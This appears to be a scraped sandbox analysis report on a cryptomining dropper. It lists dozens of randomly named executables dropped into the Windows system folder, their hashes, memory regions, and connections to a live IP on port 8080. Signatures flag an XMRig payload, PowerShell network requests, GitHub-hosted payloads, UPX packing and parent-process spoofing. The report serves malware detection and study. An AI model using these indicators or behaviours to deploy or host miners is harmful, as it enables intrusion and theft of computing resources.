C:\Windows\System\MIXWgiq.exe

C:\Windows\System\MIXWgiq.exe

C:\Windows\System\iKxuNRp.exe

C:\Windows\System\iKxuNRp.exe

C:\Windows\System\JnhaPik.exe

C:\Windows\System\JnhaPik.exe

C:\Windows\System\cLYCyZm.exe

C:\Windows\System\cLYCyZm.exe

C:\Windows\System\wfbYrSM.exe

C:\Windows\System\wfbYrSM.exe

C:\Windows\System\bjvJzOb.exe

C:\Windows\System\bjvJzOb.exe

C:\Windows\System\puluPox.exe

C:\Windows\System\puluPox.exe

C:\Windows\System\mIVTvBW.exe

C:\Windows\System\mIVTvBW.exe

C:\Windows\System\GZkxgtb.exe

C:\Windows\System\GZkxgtb.exe

C:\Windows\System\cfdQoky.exe

C:\Windows\System\cfdQoky.exe

C:\Windows\System\kzhayRx.exe

C:\Windows\System\kzhayRx.exe

C:\Windows\System\KdSYJtH.exe

C:\Windows\System\KdSYJtH.exe

C:\Windows\System\zApXLfV.exe

C:\Windows\System\zApXLfV.exe

C:\Windows\System\ZLLHQlV.exe

C:\Windows\System\ZLLHQlV.exe

C:\Windows\System\QjXiwMH.exe

C:\Windows\System\QjXiwMH.exe

C:\Windows\System\KBOtJFf.exe

C:\Windows\System\KBOtJFf.exe

C:\Windows\System\QCHAErs.exe

C:\Windows\System\QCHAErs.exe

C:\Windows\System\lROmnBN.exe

C:\Windows\System\lROmnBN.exe

C:\Windows\System\vGLwfew.exe

C:\Windows\System\vGLwfew.exe

C:\Windows\System\dcrDiiX.exe

C:\Windows\System\dcrDiiX.exe

C:\Windows\System\nCfAytm.exe

C:\Windows\System\nCfAytm.exe

C:\Windows\System\WNLXKWv.exe

C:\Windows\System\WNLXKWv.exe

C:\Windows\System\ZEqryIy.exe

C:\Windows\System\ZEqryIy.exe

C:\Windows\System\ydRwgmX.exe

C:\Windows\System\ydRwgmX.exe

C:\Windows\System\psJTIos.exe

C:\Windows\System\psJTIos.exe

C:\Windows\System\WljmEcp.exe

C:\Windows\System\WljmEcp.exe

C:\Windows\System\QVnRZCd.exe

C:\Windows\System\QVnRZCd.exe

C:\Windows\System\IricXGB.exe

C:\Windows\System\IricXGB.exe

C:\Windows\System\gxKJiPx.exe

C:\Windows\System\gxKJiPx.exe

C:\Windows\System\MjrZHmk.exe

C:\Windows\System\MjrZHmk.exe

C:\Windows\System\yfppUvD.exe

C:\Windows\System\yfppUvD.exe

C:\Windows\System\YOlFVmm.exe

C:\Windows\System\YOlFVmm.exe

C:\Windows\System\wwqhTNM.exe

C:\Windows\System\wwqhTNM.exe

C:\Windows\System\mgJccwW.exe

C:\Windows\System\mgJccwW.exe

C:\Windows\System\GhpNHQl.exe

C:\Windows\System\GhpNHQl.exe

C:\Windows\System\TgoeBZJ.exe

C:\Windows\System\TgoeBZJ.exe

C:\Windows\System\MsScZwr.exe

C:\Windows\System\MsScZwr.exe

C:\Windows\System\yGVFoMx.exe

C:\Windows\System\yGVFoMx.exe

C:\Windows\System\MLNgmYt.exe

C:\Windows\System\MLNgmYt.exe

C:\Windows\System\byKRuHN.exe

C:\Windows\System\byKRuHN.exe

C:\Windows\System\uOkdpwU.exe

C:\Windows\System\uOkdpwU.exe

C:\Windows\System\MEylzrn.exe

C:\Windows\System\MEylzrn.exe

C:\Windows\System\qssjlJQ.exe

C:\Windows\System\qssjlJQ.exe

C:\Windows\System\zwKyWYC.exe

C:\Windows\System\zwKyWYC.exe

C:\Windows\System\LGprtfW.exe

C:\Windows\System\LGprtfW.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2936-0-0x000000013FD50000-0x0000000140142000-memory.dmp

memory/2936-1-0x0000000000080000-0x0000000000090000-memory.dmp

memory/1368-9-0x000000013F750000-0x000000013FB42000-memory.dmp

C:\Windows\system\zLGcPWb.exe

MD5 39890608c9eedd4f46fd4f8cabaf2d2b
SHA1 74e865a280732949d12470917d9d0bb68aa6a549
SHA256 92ebcf328e8f45472ba4c4ae0fc8c0b19635c3de15233a39c433b625572cdfd9
SHA512 a643c4c6d745f18d12ea80ac94e8983ec3efdc9e1c798496b1fa4563c6d9a9b9fcd24282e80dac084d408c53fb71f1d3bc44bf246b18d4c1b66df0db130e9613

C:\Windows\system\fbeAOgx.exe

MD5 d92034557971103588159e9c3838ee15
SHA1 4239a43947c96ae346b4873f01f9d30d06cb9aab
SHA256 2b98c7433be91c56ee55a860fb59ebee7e02d37d38769597ff248cedc9313957
SHA512 3a66dc78b73715e398b5c5ad43977ff8612c1e9d01024eacb3e06453fd7b7c43e8801d7b5fe39edd06328a9b3b0bfe653a379060ca6b11ca1560ba88c984826b

C:\Windows\system\sLKnBhc.exe

MD5 3b2ab79c30f809f71ab1666980469ed1
SHA1 263bba49dd23c3d7fa40d13e389183715122d7b9
SHA256 f286564a4b0cfad60f7806ce34029294837da00ea66b6a1734f823d4fe8eaf52
SHA512 b7905e6752b7ed94c988a37d19c5022cacc6261a3b00b0e259a053ef89375a8884f67f78c5e5fbbd514ea67ff67ab488ac9406b6da260e3adf5c4ce2929d659d

C:\Windows\system\dPhRdxK.exe

MD5 685e26e4f27ea52d1979f8d5cfabcf37
SHA1 3997f380ca66ac2c873811f2e78fb83cfdb02cc0
SHA256 bf5582aa6bf265395a2b517b960914b2386327524d694e93c33820982689a4f9
SHA512 fb3e45bba6f0f1462b3c2497badc56677a0f621812e8917dd77b209300df23d0f6981aba53521fec6382543ef6857afa15e00705f46778f555f44aca6710891e

\Windows\system\wKGUGVB.exe

MD5 5279789014bb24d60b5e3f2bc7426221
SHA1 fc329f789b41a852d2cdf36aa22b754c4f3267fc
SHA256 7d3a37996bfd9be40b0416a296ad049a3aa66db89bef53a2759cd3e43663b35b
SHA512 377cf57877eb041567db16f15738799df703a68f863af4a4592c8bb218d1640f01f1a0c718356c5bcecdc7ecfacdf8fe2d514f85c9a36348b9ab4d6d5ed4c1d6

C:\Windows\system\GSnpsQD.exe

MD5 ea54d4bd35c3b46cb595c18563ef487f
SHA1 6bb93ced4338490b7c3044c5b5c2d0930826dd6e
SHA256 41fd3b37293161fd01013f4c9b3fa59012d058be7023af6f79a2ffa1666cff86
SHA512 1ef4e46a6baf4870cb4a2ceb51253a09b7162b31bf754d15154947d1ea940f7cccd6a2c67f37401f483827f24602c1b372cea833a9d06b986f3b0c2b10ab8fb1

C:\Windows\system\OdTTrXW.exe

MD5 620facf98fd49dcd535c76112f6ed972
SHA1 20289300d98bf219c9209651cb2b325b9d515ca2
SHA256 8ae8d4de2d04fc4d97f3713a4c3595ce284b27ee52d907dea8fac52a19adad54
SHA512 6c8f4b378aed02364dac337268b4acda9bd0d1ed511b903ed90d5eb78754c861b2df01771fbe28cb6a32641bb687eb2dda28b30ea073d7bef5c49bf4ec88446e

\Windows\system\Bbdyuxd.exe

MD5 3ed884645c56cc997d9637503ccd61e5
SHA1 7c1f92b0fe8aacf02b1d91ef182f515751796dde
SHA256 432e2d1bec58f06255ebafd41e6644d591e03a385be9a84799ec5e60d6603996
SHA512 2df186c6c5f62aef5779fcc8c36f34bc0d2d2202d720831db1e680e1b646ad3dc845c311b80d7d5b5f0f848403dab20d60303334aed8043fc3d917e69f221f9e

\Windows\system\DBalsZL.exe

MD5 1c7362fcc45a2af9e91aff71bc94a93e
SHA1 e52465ed10c93bb77fbffdcd9d37501bb943aa60
SHA256 34af1913d4205f1917f2252f2cc0a467401a89890d2096d9fa567422d2889e27
SHA512 bba716fa306c53b63f57bfc5a57c49d94182f470e45bbe3ccc74bbfe1e062b959a65974f76b717b7f3a9f9c8e2fc0fe04b9cd6ec1d0ee26ecfff1a0ff4dc69f7

memory/3060-75-0x000000001B5B0000-0x000000001B892000-memory.dmp

\Windows\system\vglspTn.exe

MD5 3984b674363b76a73708cf26096404bf
SHA1 37ae2a05ca861e55d6f4ee0a033948e65feb3093
SHA256 52cb1910470a2cd5986d87676e426fe3944876ed96a07e95e3de4275802fe995
SHA512 d4bae6c07fe8a6cb5d10c51329f0e824c8f67dd79964533812e69b39f220bebcbc6d7d8729c5503057254b807fe74a50db9b381fa06ef1904c88dc6cba95a8c5

memory/3060-93-0x0000000001D90000-0x0000000001D98000-memory.dmp

\Windows\system\QieheqP.exe

MD5 a79cd0833d8237717a7d5ef2e11a942f
SHA1 6fde35e7ab6578e16a75bf9c35c206f314bd6267
SHA256 06e199efe573c40a8d5f4090e470212dc9c066ff3ad8adb01284ae27347ef941
SHA512 37e1e191442da774b7e6b555b1ccd7c5cbe1021915df6f4986ab53b82517881949afcaa55cd120e7859600b044ce173da80275ba530c9282c84fe83369b07589

memory/1368-1201-0x000000013F750000-0x000000013FB42000-memory.dmp

memory/2936-1200-0x000000013FD50000-0x0000000140142000-memory.dmp

C:\Windows\system\QGGqJKa.exe

MD5 6d91f98921d1cf7974d0ec6f38339cd4
SHA1 c9885e86d0c38b49688bdca974d7d38be52b5d1b
SHA256 bb7481e4f5afb0e6f61818b0bf8148f455f8c805f4e41a86020d8ebaf5d0986a
SHA512 14820f89fc54bca1fb7518bb44dde6bd5c8f90564c6d303bc362a81a99bc8fbd71206c8c48aa98b86abb7c24310e470d4d6c5c13c6d5afba92bd6842182fac9b

C:\Windows\system\hyTSDbk.exe

MD5 ebdc881b20184cb59109c94e7d60f342
SHA1 e0d2d13e5c2a87011cbdf2302fb24403f424b366
SHA256 a7c26b40a7d601cdf597c836c58335688ad4ae102486cb59de897d9edb87968d
SHA512 64532384aaeb930a425f8b851e6b0d86717cd535c782dfc0939e38b9e649fe730e88bb782b0dd097718d455ae720a0b86988ef2264f9181a3bfa0ad151d4dde8

C:\Windows\system\qkBFAQU.exe

MD5 5fdea4d89b5358e81b5c072afb2990fd
SHA1 445590b72f32f1c18643c94593d47d3edc7e4b40
SHA256 2318bbe3ee3dbf439b3c16fb1fdc7ebba80b439384ff4d4ff2018110a682a265
SHA512 c88ff1193a2a5d8b6fd4bf7699cf20789cab2b16c9eae85224e9ec16eec2df8a549637c8d86237f5988fc1a3fa30bde32590052d3c35a6e0be4ee1c57db65a7b

C:\Windows\system\fJprSFw.exe

MD5 4cd5d79e9767c9ca6bd16a19e2aa290f
SHA1 5dfe24f73197e3e9ba47b3bb7eeafe642f56ba50
SHA256 0a0e49e2e8c4bc3dea27099c917d1dc9445edc94ba2f996752946f306b2e6500
SHA512 1729e14b3116a6a08502bb65ae921d1e8cc743fd4d16697e0e1fe460eddbba9c2d22e7715da27d92631f26fb62bab62ab5da951df1a37189ba8526e432c6e682

C:\Windows\system\DYRIhfB.exe

MD5 a971494fd2bf4c04532b5c8b8167725b
SHA1 55b6540491e909bc43c8e7c201aec7e29e36a874
SHA256 6aff66d9c5588b9ab13218d133eda9be8e597c17a702b7df2f407edb8662e50d
SHA512 ee5cb8a5bb4f52bddbe34a62282572489da21a087d42ef143cce4f474a309727538e86fdaf069ba4fc5ab5d3c03ba6405407c9013d6174fec878af9c79bfb326

C:\Windows\system\cOrITQH.exe

MD5 2d90f3c4c92078a72bd66b2467cf2b47
SHA1 5ec07c8b755b83f037226ad13a12361e2eaf67de
SHA256 2e65fb26970562748de2020e27e1b680be7ee7cf49b2b54b605f00c8e3a593cd
SHA512 ac595785cea3581c40296001f5c2ddbe57c4209674ab2c498e76628a7731247eb28d203d738239ac9fa599a6be0c3d67901d51fbea2c427da81dcfd6e0a87d69

\Windows\system\YKZfSTm.exe

MD5 840bf76836bb67bc9b00813defafff29
SHA1 e6964498adeeab6ac6fc115f114c0dbd53fa3546
SHA256 aa895042cd8616df71bf751510e2e78eb8023d0797233ff2ace388d712c46526
SHA512 0e9483bf8d297e0e294345fef5c971a6dacf6ddebb1d24b8e3ad1a96f7793613f3bc45da66c86cab53d192ac0533e88f7242cee9ea074547aaee471c735975f8

C:\Windows\system\UaSPdxs.exe

MD5 7567c52d0fb9c75f2b241f29c0cbcfd9
SHA1 ce947195b4343fbed90c2c46be373ef101026622
SHA256 2825c3d3dd8e0f103601ad2ec75632a02b6522d5c159edea064a428496d7a390
SHA512 dde849fdf0751e31cc6349325ba7ba9208e6860ae63b2f2d34d4c672877acf8ec24b92bbb4f6c5365a9fe6bb7051201c556d5d5b15429df2fc6215212f2d191f

C:\Windows\system\wNZMGiu.exe

MD5 1f90344b3dd287810ec74e1fb77ddf66
SHA1 3e24c8b50a8cbe97186e62aa82e9d96fcb1bdb07
SHA256 7af5a11bc47c67c946f13eff6c27ced46c54c2ffadd4de89ad874b17577bf4fc
SHA512 dbd28f2d55a1913fcd1bd8773c166a00c21dfa08b7379d7037df8985d56a129816e3f6ecf667f787eafdc8edf94f09eb4f36a5a01a81a1b4a474633faa600675

C:\Windows\system\rUaGoxM.exe

MD5 f706919fba6d5f4dde9960720a845ced
SHA1 9fcf7e17a77323c9922fd1e8001203e84d50b52c
SHA256 29646d706956cebff454f1fa71ade691711a6f1a9a3bd952a4ada43e7865aafd
SHA512 ae6002ae5eb45a07c08fc50bfd1db2757f8b59e398da73700e445425a44bfe60ef229d87e48af08dff8bd70dcc7670d6567c03ea451240c7f9399aa310aa2247

memory/2444-140-0x000000013F9D0000-0x000000013FDC2000-memory.dmp

C:\Windows\system\TQqamMI.exe

MD5 b88f09c66fa6047ffaf5c3f13a9d6bb6
SHA1 c200b8f70d2818af52aa285c62863d9ca19c7eb0
SHA256 e4fdd6d163c9372b57eb80f5b0ca1b96280df2ee97bf633e8e2e7438c1d513c8
SHA512 fa32c4ec2485c22198116675e001c0f6b8ebabd475dece1f8ce351e92101cabaeb6d9a88bf7ec7a883c4ca30dd3d80e89969172e835c61af628afb857de47cc8

C:\Windows\system\hRkqUkH.exe

MD5 dd366326a1ac7fc27732e119480fae88
SHA1 f65e60c84f8741f3c46b9dab66ff3676bd6fd85a
SHA256 465add48ebb12a1ac20d0cc802cd64ac1da053366815e7d97fb2dcad501ed9de
SHA512 cd88328ad9f2e68dd8addc4e87a4d832c4fe83f7bc2d72e8377e7a83f1822b8fed901eb8bab32d506ee93849a46e08dfb9af0ceb5970414fea48175fa8142c89

memory/1500-136-0x000000013F940000-0x000000013FD32000-memory.dmp

memory/2936-132-0x000000013F940000-0x000000013FD32000-memory.dmp

memory/2768-131-0x000000013F6D0000-0x000000013FAC2000-memory.dmp

memory/2936-126-0x000000013F6D0000-0x000000013FAC2000-memory.dmp

memory/2628-125-0x000000013F950000-0x000000013FD42000-memory.dmp

memory/2936-124-0x000000013F950000-0x000000013FD42000-memory.dmp

memory/2852-123-0x000000013F9B0000-0x000000013FDA2000-memory.dmp

memory/2936-122-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2872-121-0x000000013FC40000-0x0000000140032000-memory.dmp

memory/2936-120-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2856-119-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2936-116-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2208-115-0x000000013F170000-0x000000013F562000-memory.dmp

memory/2936-114-0x000000013F170000-0x000000013F562000-memory.dmp

memory/2876-113-0x000000013F8B0000-0x000000013FCA2000-memory.dmp

memory/2936-112-0x000000013F8B0000-0x000000013FCA2000-memory.dmp

memory/2808-111-0x000000013FDD0000-0x00000001401C2000-memory.dmp

memory/1788-110-0x000000013FCB0000-0x00000001400A2000-memory.dmp

memory/2936-77-0x0000000003160000-0x0000000003552000-memory.dmp

memory/3060-76-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

C:\Windows\system\Msthvdb.exe

MD5 99f7a60c21a21d4e13103f8c566e0747
SHA1 b290eb795b3bd4b781e72d1515ea6e6a268f7d80
SHA256 dd7f370ee21bd4c0b764c5b073fa04d7716b759acdf272733d0c319a8e340229
SHA512 5b7f0bd07ded7f51271a7481b542e2cdafc78a848711874f0151e80bb0c66cda4e3e09f97c400b4d79ea929e3e90bd447da60bf8972ecfb2095a90a1740f1c7d

C:\Windows\system\SIRraOO.exe

MD5 93b14829e410f24e60ae8ac2f228c5a2
SHA1 8e59c2d6242af8c5b8e28bc234dc5cb853a92480
SHA256 82863ca5290bb69e1cd99a7a5d85158507b7e3bde82e93f3123cfb72ce0b05d7
SHA512 73ac7ae5236cba0efc494b65f4d960521c48283e92f58cc7d5349c34b8eaccf040a7b7b0c93e96d529318a473a3fd3d1b95ab2aedc1e47f19fd5acbdc466928b

C:\Windows\system\mHtnkLe.exe

MD5 753648a3ef23948b4fb784fa50a80b29
SHA1 6dc833ee2b93ab4e399ea7462e4848cb89209a29
SHA256 9db84a2640acbacc0884f4e040e5378bb089aac6531d04d58b497fc41d712f74
SHA512 d35b8ffd19c98a824e0679169742286fbbd2a8c1fa6c2c064dd99a61637519c7607cf5dd36c28f3142a497205395ed2b05328c8f06aa8bdb05a61e506240c8f3

C:\Windows\system\MhVjhhz.exe

MD5 1ab5af36dad751b77a4f393169a13267
SHA1 0a8fddfe6c788120f50b341b30d3d44bf6b44de5
SHA256 b40df0abf0d7b3260a3589b2e0247230173bf4e8008b14b8853cb9b8472f74a6
SHA512 7b78219db760abecea3be6aef583f9dafeda5ee4e5039b4dc144fb010e1fdf9ac8ba9a55f06680623b9c61bb7216162bca490ba16842962cb732608e1e511022

C:\Windows\system\OmLirDO.exe

MD5 95ca3e489ee87520d1e395f26743dbf2
SHA1 ec377e78e3fdcce89dd2a15111c045e42c0ca4d5
SHA256 a76ece807cf81b8a4153f73158f647c9b31ac74a7461643047b39e7f878954e4
SHA512 3d71461c818230dae5e116c1f7797359424b3a13800d67901811affdd22b657a44875649bddd2555e9664763d22c89bb2fc3c5108041c76f0d3af324cd57d508

C:\Windows\system\gqbhrYH.exe

MD5 21a160e68f306214e1f190a729de78cb
SHA1 3b68e86a3935f49ea9290fe3a3df397431f79877
SHA256 bb79681b4deea9cd8fb10ed9e80389a7566b55561adda5e148e5e04326d9336b
SHA512 cda9cf23ea2eaf95e1f8c274f543787dac8c9f88ce55c6b8bcd6b92467007f4c13722718c7ca669063d5f3c23fedc67ce8b5ce613f108aba42da871836794416

C:\Windows\system\sftvZTT.exe

MD5 bd8064476e81db808846350ecdc89759
SHA1 9c3750460d7f70d9fd69971ce6fe0373adb70f92
SHA256 431783beac7761c854911fc66720c2d6b6b47530e8dee8d312ff31b4de99ea2b
SHA512 8222f3bed266b7826ed1b67f1c90fe7a96c0d4784fa4f387012cac1f775093e03ae124c110e63079d4b0c487310ec81582e0245f5313590f496a3a863c7e93fe

C:\Windows\system\mQFsvBO.exe

MD5 43001000fd230c8d1da6aa44148de151
SHA1 caee04a6e17cd1e7604e54eb424a88ef2e77a8dc
SHA256 399431b8028c34bdf7a6d93cbc58c18178f1f423af8cf087063d73dda291db20
SHA512 02efc003449cc415e5db2b458f6a33fdd4b8f4243b6191410519be65b0e3cb99bb18d68d1cb94e4795a0853a404e9d95de1df5404194e26a56ffa942edca6a93

memory/2936-10-0x0000000003160000-0x0000000003552000-memory.dmp

C:\Windows\system\Cklaxgu.exe

MD5 36e593858d5ddd449b31bc5ae2e7216c
SHA1 a680698ea559dcf50806c15f674471167cb3088a
SHA256 393757edf54d9fb650c82d38ccf91e52ff167e99c09adacb715b14a5e44b3525
SHA512 64ebdf48fe0898770006691b267eb7c9cc6244517aadf589e3d1167bb923af4b1905871ff9ca512fb45cebeb36384670ac8d80e629d659597e3eca548f70c474

memory/3060-21-0x000007FEF56DE000-0x000007FEF56DF000-memory.dmp

memory/3060-20-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/3060-19-0x0000000002CB0000-0x0000000002D30000-memory.dmp

memory/2936-18-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2936-6-0x000000013F750000-0x000000013FB42000-memory.dmp

memory/3060-1871-0x000007FEF5420000-0x000007FEF5DBD000-memory.dmp

C:\Windows\system\jsNwShP.exe

MD5 92dce7fd7ec69f225baee909f1f20d27
SHA1 0fe748b20df273698767537e59de10e23a351a61
SHA256 3a8d52b801fd1c8bd120153342611f7386eb5ce0ad255d57304ec96ec9b31a84
SHA512 1e58e425b780ebf633a365e2d3edf8bb342f5bfe09e8d802b0d4dd60a53770b35758c32e598b9a4f78c23d6a0841ec0499f88be809f17838167d0c02b8f0c743

C:\Windows\system\VEgqVCM.exe

MD5 aa9b19bd76b278f575ef11895ddc2839
SHA1 f59244389c8ce9fcc6897b3455d31a70cb73ce7a
SHA256 fe421b0e0e55e116e3e0b47448adb31ad99c09631f55c49525549ec9ddcfeac6
SHA512 eb71ff98846e00073df75729bb0167629b63d3dadab26273f54670f22c8df5dda5951e3e07b231f597061979997c5b8ac4054ed7d66f1f66018bb6df6c2d7366

memory/1368-6686-0x000000013F750000-0x000000013FB42000-memory.dmp

memory/2876-6688-0x000000013F8B0000-0x000000013FCA2000-memory.dmp

memory/2444-6687-0x000000013F9D0000-0x000000013FDC2000-memory.dmp

memory/2852-6689-0x000000013F9B0000-0x000000013FDA2000-memory.dmp

memory/2768-6694-0x000000013F6D0000-0x000000013FAC2000-memory.dmp

memory/2628-6702-0x000000013F950000-0x000000013FD42000-memory.dmp

memory/2208-6703-0x000000013F170000-0x000000013F562000-memory.dmp

memory/2872-6753-0x000000013FC40000-0x0000000140032000-memory.dmp

memory/1500-6761-0x000000013F940000-0x000000013FD32000-memory.dmp

memory/2856-6700-0x000000013F070000-0x000000013F462000-memory.dmp

memory/1788-6762-0x000000013FCB0000-0x00000001400A2000-memory.dmp

memory/2808-6966-0x000000013FDD0000-0x00000001401C2000-memory.dmp

memory/2936-7449-0x0000000003160000-0x0000000003552000-memory.dmp

memory/2936-7450-0x000000013F950000-0x000000013FD42000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 09:25

Reported

2024-11-13 09:27

Platform

win10v2004-20241007-en

Max time kernel

96s

Max time network

97s

Command Line

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 10712 created 1404 N/A C:\Windows\system32\WerFaultSecure.exe C:\Windows\system32\svchost.exe

Xmrig family

xmrig

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\zLGcPWb.exe N/A
N/A N/A C:\Windows\System\mQFsvBO.exe N/A
N/A N/A C:\Windows\System\Cklaxgu.exe N/A
N/A N/A C:\Windows\System\fbeAOgx.exe N/A
N/A N/A C:\Windows\System\sLKnBhc.exe N/A
N/A N/A C:\Windows\System\gqbhrYH.exe N/A
N/A N/A C:\Windows\System\OmLirDO.exe N/A
N/A N/A C:\Windows\System\MhVjhhz.exe N/A
N/A N/A C:\Windows\System\sftvZTT.exe N/A
N/A N/A C:\Windows\System\mHtnkLe.exe N/A
N/A N/A C:\Windows\System\SIRraOO.exe N/A
N/A N/A C:\Windows\System\Msthvdb.exe N/A
N/A N/A C:\Windows\System\dPhRdxK.exe N/A
N/A N/A C:\Windows\System\GSnpsQD.exe N/A
N/A N/A C:\Windows\System\wKGUGVB.exe N/A
N/A N/A C:\Windows\System\DBalsZL.exe N/A
N/A N/A C:\Windows\System\OdTTrXW.exe N/A
N/A N/A C:\Windows\System\hRkqUkH.exe N/A
N/A N/A C:\Windows\System\Bbdyuxd.exe N/A
N/A N/A C:\Windows\System\TQqamMI.exe N/A
N/A N/A C:\Windows\System\vglspTn.exe N/A
N/A N/A C:\Windows\System\wNZMGiu.exe N/A
N/A N/A C:\Windows\System\rUaGoxM.exe N/A
N/A N/A C:\Windows\System\YKZfSTm.exe N/A
N/A N/A C:\Windows\System\UaSPdxs.exe N/A
N/A N/A C:\Windows\System\DYRIhfB.exe N/A
N/A N/A C:\Windows\System\cOrITQH.exe N/A
N/A N/A C:\Windows\System\fJprSFw.exe N/A
N/A N/A C:\Windows\System\QieheqP.exe N/A
N/A N/A C:\Windows\System\hyTSDbk.exe N/A
N/A N/A C:\Windows\System\qkBFAQU.exe N/A
N/A N/A C:\Windows\System\QGGqJKa.exe N/A
N/A N/A C:\Windows\System\EVWKxVh.exe N/A
N/A N/A C:\Windows\System\UOZEPpS.exe N/A
N/A N/A C:\Windows\System\qChdeXc.exe N/A
N/A N/A C:\Windows\System\sHLCJEP.exe N/A
N/A N/A C:\Windows\System\PTDltoy.exe N/A
N/A N/A C:\Windows\System\OMLMVxQ.exe N/A
N/A N/A C:\Windows\System\whZqEbZ.exe N/A
N/A N/A C:\Windows\System\aHKIWtK.exe N/A
N/A N/A C:\Windows\System\Wruzkcw.exe N/A
N/A N/A C:\Windows\System\kRrBBbD.exe N/A
N/A N/A C:\Windows\System\LkSrxnd.exe N/A
N/A N/A C:\Windows\System\yhblSEe.exe N/A
N/A N/A C:\Windows\System\LSCjWCS.exe N/A
N/A N/A C:\Windows\System\omzNmfB.exe N/A
N/A N/A C:\Windows\System\ESdzCqy.exe N/A
N/A N/A C:\Windows\System\JLzXxeN.exe N/A
N/A N/A C:\Windows\System\dtQKzUx.exe N/A
N/A N/A C:\Windows\System\DCLCiHY.exe N/A
N/A N/A C:\Windows\System\CmZJrAM.exe N/A
N/A N/A C:\Windows\System\CfqPGyp.exe N/A
N/A N/A C:\Windows\System\mOsacio.exe N/A
N/A N/A C:\Windows\System\nEZVesq.exe N/A
N/A N/A C:\Windows\System\FMDAFra.exe N/A
N/A N/A C:\Windows\System\IvTLFja.exe N/A
N/A N/A C:\Windows\System\xCYvitD.exe N/A
N/A N/A C:\Windows\System\DnkxgtF.exe N/A
N/A N/A C:\Windows\System\LHdTzsw.exe N/A
N/A N/A C:\Windows\System\VErGPwE.exe N/A
N/A N/A C:\Windows\System\KJyfaBf.exe N/A
N/A N/A C:\Windows\System\YAFRjSj.exe N/A
N/A N/A C:\Windows\System\irdJWee.exe N/A
N/A N/A C:\Windows\System\NkaZDDP.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\rcYotlZ.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
File created C:\Windows\System\WwTVSka.exe C:\Users\Admin\AppData\Local\Temp\358a26d71ed59656da598681fe9bca22b413f402e65c7797a7e3614c22413ce8N.exe N/A
